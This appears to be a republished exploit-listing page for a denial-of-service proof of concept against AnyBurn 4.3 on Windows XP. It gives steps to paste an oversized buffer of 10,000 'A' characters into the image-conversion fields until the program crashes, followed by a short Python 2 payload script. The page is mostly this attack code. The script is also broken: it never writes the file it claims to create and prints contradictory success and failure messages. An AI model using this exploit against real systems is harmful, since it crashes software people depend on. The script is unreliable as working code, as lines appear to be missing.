Anyburn 4.3 convert image to file format denial of service Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-01-31 | Type : dos | Platform : windows
This exploit / vulnerability Anyburn 4.3 convert image to file format denial of service is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: AnyBurn x86 - Denial of Service (DoS)
# Date: 30-01-2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage:
# Version: 4.3 (32-bit)
# Software Link :
# Contact: services[@]
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested Version: 4.3 (32-bit)
# Tested on: Windows XP SP3 ENG x86
# Note: The other exploitation field in Anyburn was discovered by Achilles
# CVE: TBC from Mitre
# Created in preparation for OSCE - DC - Telspace Systems
# DOS PoC:
# 1.) Generate exploit.txt, copy the contents to clipboard
# 2.) In the application, open 'Convert image to file format'
# 3.) Paste the contents of exploit.txt under 'Select source image file' and "Select Destination image file"
# 4.) Click "Convert Now" and the program crashes

buffer = "A" * 10000

payload = buffer
print "[+] Creating %s bytes evil payload.." %len(payload)
print "[+] File created!"
print "File cannot be created"